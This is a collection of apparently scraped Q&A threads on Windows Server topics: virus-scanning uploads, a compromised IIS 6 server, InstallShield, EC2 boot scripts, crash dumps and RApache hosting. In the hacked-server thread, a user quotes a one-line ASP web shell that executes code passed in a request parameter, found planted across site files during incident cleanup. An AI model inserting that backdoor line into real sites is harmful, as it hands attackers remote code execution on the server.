On-demand virus scanning Windows - windows-server-2008

I'm wanting to scan files a user uploads to our websites on the server-side. I'd prefer it to be something we can run on-demand that doesn't have to be running all the time on the server. What solutions are available for Windows Server 2008 R2? Which products specifically would you recommend?

If I were in your situation, I would script up a solution to call ClaimAV on the file, whenever you receive the file. For Windows, if you are running IIS, (or any web framework) there is probably some sort of callback on file reception you can plug this into.

Almost all the antivirus programs provide you a command-line version (or starting parameters) to scan just one file, or a directory.

There are several scanners on demand, there is a list named "Probably the Best Free Security List in the World" which lists a few, sorry I cannot provide the link because StackOverflow limits the amount of hyperlinks new users can post.
Although not listed in that list, one of the best I've used is the F-Prot Antivirus and it seems it runs well in Windows Server 2008
https://forum.f-prot.com/index.php?topic=1691.0
Cheers

For your case the best solution would be using http://www.virustotal.com/

Related

I think ive been hacked and looking for advice

One of my clients noticed a message in google search results that said their website may have been hacked. After some digging, I found html files on the server that contained seo garbage and javascript references. I removed those files, change cms passwords, updated some components like CKFinder, etc...
I then started looking into other sites on the server and found tons of .asp files with this line
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
I've removed those but do not know how they got there. I've looked through various logs (event viewer, website, ftp) but most don't go back far enough from when the files were created.
I've updated the OS, which was only a month or two out of date, and changed ftp access.
What else can I do to find the point of entry or make sure my server and sites are safe?
BTW: This is a windows 2003 server running IIS 6.0.
There is multiple ways that they may have gotten access to your server.
Are you running a common CMS or custom?
It could be possible that they have found a vulnerability in one of your scripts.
for example if they found a SQL injection vulnerability they could retrive database information.
if they where to find a RCE bug (remote code execution) they maybe have been able to execute system commands leading to the creating of those arbitrary files.
Other than that, there are a few vulnerabilities in windows server that have been patched this week, check out this link :
http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html

InstallShield SQL .bak

The problem is that recently on my company we need to make an installer, since anyone haven't worked with InstallShield Before we have a lot of questions about it.
So here are the questions:
Am I able to restore a database using InstallShield? I mean, giving to it the path of the .bak file and then run a script and recover the database on mssql?
Does Install Shield have configuration files, so I'm able to change the files that are going to be used, depending on the client and the software version we are installing? Nowadays we use our own setup, but we have to select the files manually, so when a client whants to install a software we have to go with them and do it, because is really complex. Now we need to change that by making an installer that can be configured here in our company by and IT member, then send the files and the installer to the client and he only press "Next, Next..."
Sorry for my bad english
You might find that treating the front-end software and database as two separate items is easier for you and your clients. While many vendors offer the ability to run scripts against SQL Server (and other databases) during the course of the installation, you'll find that there are all kinds of issues you need to contend with (do you need to first install SQL Server, does the user have permission to access the SQL Server, what if they are installing the software on a new pc but don't need the database created again, etc). None of these are showstoppers, but they do create headaches that you need to deal with.
By treating the database and front-end separately, you can build an installation package that installs your front-end software and related components on the target machine. This in and of itself can be tricky to deal with depending upon how complex your software is and the amount of references and prerequisites you need to manage.
When it comes time to manage the database aspect of the program, you may find that the majority of your clients are capable of restoring a .bak file to their SQL Server, and the ones that aren't can always be assisted (probably remotely) by your staff.
If you discover that this isn't the case, you can always create a separate "Server" installation package that manages the database aspect of the installation.
With regards to your question about InstallShield, you'll probably find better information from their website and \ or sales staff, but here's a list of their current features.
There are other vendors in the space as well, so look at all of them including InstallAware and my personal favorite Advanced Installer. Pick the one in your budget that offers the features you need. They all should offer trials as well. Download and use them before you buy to find one that works best for you.
Yes installshield can call a script that will restore a db, you just need
to do so in silent mode. and yes there is a cfg file for install shield.
the documentation will show this in detail
here is some documentation for version 12
http://kb.flexerasoftware.com/doc/Helpnet/installs hield12helplib/IHelpContents.htm
they are currently on version 2012, however if you are doing this
crossplatform, don't use installshield, but use installanywhere. it is cross
platform.

How would I created a flexible EC2 Windows 2008 boot script?

If you look at the Linux ecosystem (especially the Ubuntu and Alestic EC2 images) there is a common technique where the VMs are pre-configured to look at the EC2 user-data and use it as a boot script. The nice thing about this approach is that you can write a boot script that further provisions your machine, allowing you to avoid making a new image every time your software that runs on the machine changes.
I want to do the same thing for Windows, but given that I'm an Mac and Linux guy, I'm a bit lost on where to start. My requirements are:
This must run on Windows Server 2008
A bootstrap script needs to start when the machine boots up, read the user-data file by pulling down the contents http://169.254.169.254/1.0/user-data
The bootstap script then needs to run the contents of that file as if it were a script
The script embedded in the user-data needs to run in such a way that it has access to the desktop environment (ie: it can launch a browser, etc).
I'm not quite sure how services work in Windows or if I need to enable auto-login, so any advice here would be appreciated. The ultimate goal is to run a Java program that launches some custom software that in turn launches a web browser (IE, Firefox, etc) and is capable of taking screenshots.
The screenshot part is interesting, because in the past when I've tried this the only way I could get something other than a black screen was to have UltraVNC or RealVNC boot up as a service, though I don't know why that helped.
I'm looking for answers to three specific questions, as well as any general advice:
Should I be focussing on a Windows service or auto-login + bat file in the "Startup" folder?
If I use a Windows service, is there anything special that I need to do to make sure desktop access and/or screenshots are available?
Do you recommend any tools for common Linux commands, like curl or wget? Last time I used Windows I used Cygwin a lot, but is there something more appropriate to use here?
I have not tried auto-login on Windows instances in EC2, but here's the support document on how to enable it.
We boot-strap our Windows instances using a custom AMI with a custom Windows 'install' service already installed. The boot-strap installer reads a URL from user-data at startup. The URL points to a ZIP file stored in S3. The installer then downloads, un-zips, and executes the actual application installer -- in our case a simple CMD fie.
This setups allows us to have one base AMI and then be able to easily overlay 15+ different application configurations (without having to rebuild the AMI). If you only have one application configuration this may be overkill for your situation.
The only trouble we ran into was having our installer service start to early -- changing the service startup mode to "Automatic Delayed" fixed that issue.
We wrote our boot-strap installer in Java, launched via YAJSW, because we're comfortable with it. If you just want a few simple Unix tools, most are available pre-compiled for Windows, for example wget.
For something completely different, you could try PsExec to configure the instance after it has booted.
You can try using RightScale's free developer account to create plain Powershell scripts and associate them with your Windows instances to run at boot time. The RightScale dashboard solves exactly the problems you are trying to solve above.
DISCLAIMER: I work for RightScale.
As for screen capture CutyCapt is a simple tool you can point at a URL and generate an image from.
Unxutils is a great solution for those looking for unix tools on Windows. It's got the wget.exe that you're looking for, however, using Powershell to download stuff is not so bad either:
$wc = new-object system.net.webclient
$wc.DownloadFile("http://stackoverflow.com","test.html")
If you can write a batch file to do your setup, then you can run it at startup of the vm by doing this:
1. Run REGEDT32.EXE.
2. Modify the following value within HKEY_CURRENT_USER:
Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ParseAutoexec
1 = autoexec.bat is parsed
0 = autoexec.bat is not parsed
As an answer to #3, I would say that you can do just about anything in a batch file that you need which includes downloading from a ftp server (but not from a http server). I am really interested in this stuff and so if you have questions, try asking me.
If you use Elastic Beanstalks you can use this:
Customizing the Software on EC2 Instances Running Windows
It uses YAML formatting standards, e.g.
packages:
msi:
mysql: http://dev.mysql.com/get/Downloads/Connector-Net/mysql-connector-net-6.6.5.msi/from/http://cdn.mysql.com/
or
sources:
"c:/myproject/myapp": http://s3.amazonaws.com/mybucket/myobject.zip
I know this is a little bit late to help out with the original post but for anyone who is still reading this one solution is to use the http://cloudinitnet.codeplex.com/ project. The service is easily installed using a powershell script and will create a local administrator account to use while running.
The goal for this project was to replace the Cloud-Init project used in Amazon Linux and Ubuntu.

How to configure Win2008 to generate crash dump

I am running my C++ servi ce on Win2008 server machine. It crashes randomaly, and i do not know why. This is happening on multiple machines in customer site.
How can i configure the system to auto generate a dump of the process?
I need a method that will require minimal installations and UI, preferably only some registry hacks.
Thanks.
[edit] waiting...
You can use Windows Error Reporting locally on a machine without having to involve Microsoft and without having to sign your code. WER can be configured to store local copies of dumps. The MSDN documentation is here:
http://msdn.microsoft.com/en-us/library/bb787181(v=vs.85).aspx
It's a simple, well thought-out system, and is only a couple of registry settings to configure.
If your customer allows then i would suggest you to install DebugDiag from Microsoft. You can configure the tool to generate dumps when your application crashes and ask them to send you those dumps. I have used this quite often and found it to be successfull. If any help required please let me know.
Sign your executable then register with Microsoft for Windows Error Reporting (the signing certificate costs but WER is free). This will then collect the crash logs when the user hits the 'Send to Microsoft' button. These logs will then sit there until you log in to retrieve them. This requires no other installations on the user's machine.

What is the easiest way to install a R web application through RApache?

I use windows XP and R for my desktop use. And a shared hosting account (at some company) for my web hosting needs.
I wish to create an R web application and I understand that one such way is by using R with Apache through RApache , but since my current shared hosting plan doesn't allow me to install RApache I am a bit stuck.
So... (and here's my question) what would be the easiest/fastest/cost-effective way to get started?
Buying a more expensive hosting package ?
Hosting the thing myself? (on windows ?!)
switch to some other hosting company that permits the use of RApache?
Any suggestion will be most helpful.
Self-hosting is an option if you insist on using RApache. This might be easier than you think. Here's a link to a blog post i read a month ago before i decided to buy the hardware and server my own files. i just watched this seven minute YouTube video tutorial entitled "R Web Application–'Hello World' using RApache" I believe this was just posted today.
In seven minutes, the author walks through building a "hello world" Site using RApache then walks through a more ambitious example, building a user-input form to collect inputs then deliver them to a particular R function--pretty much a exemplary slice of what i suspect most people would want to use RApache for.
A second option is using a web framework. My recommendation here is Django. Why? It's written in Python so you can access R functionality via the python bindings (RPy2). Second, if you are not an experienced web developer, Django is in many ways, a great framework to begin with because it's truly a "full-stack" solution--it works more or less out of the box. In addition, there is a substantial and growing body of quality step-by-setp tutorials, code snippets, and even packaged django Sites, to learn from.
it seems they provide a VMWare image to get up and running quickly.
I suggest you download VMWare player and try the image. Since RApache isn't available for Windows, this is the most simple way, I guess. I wouldn't use that for hosting, but I would first try whether this stack is actually the right thing for your app. Also, this allows you testing things locally.
Doug,
Should I read your suggestion as saying that a Django app can call the RPy2 functionality without RApache? If so, that sounds like a solution for folks on shared hosting who can't install the RAPache module.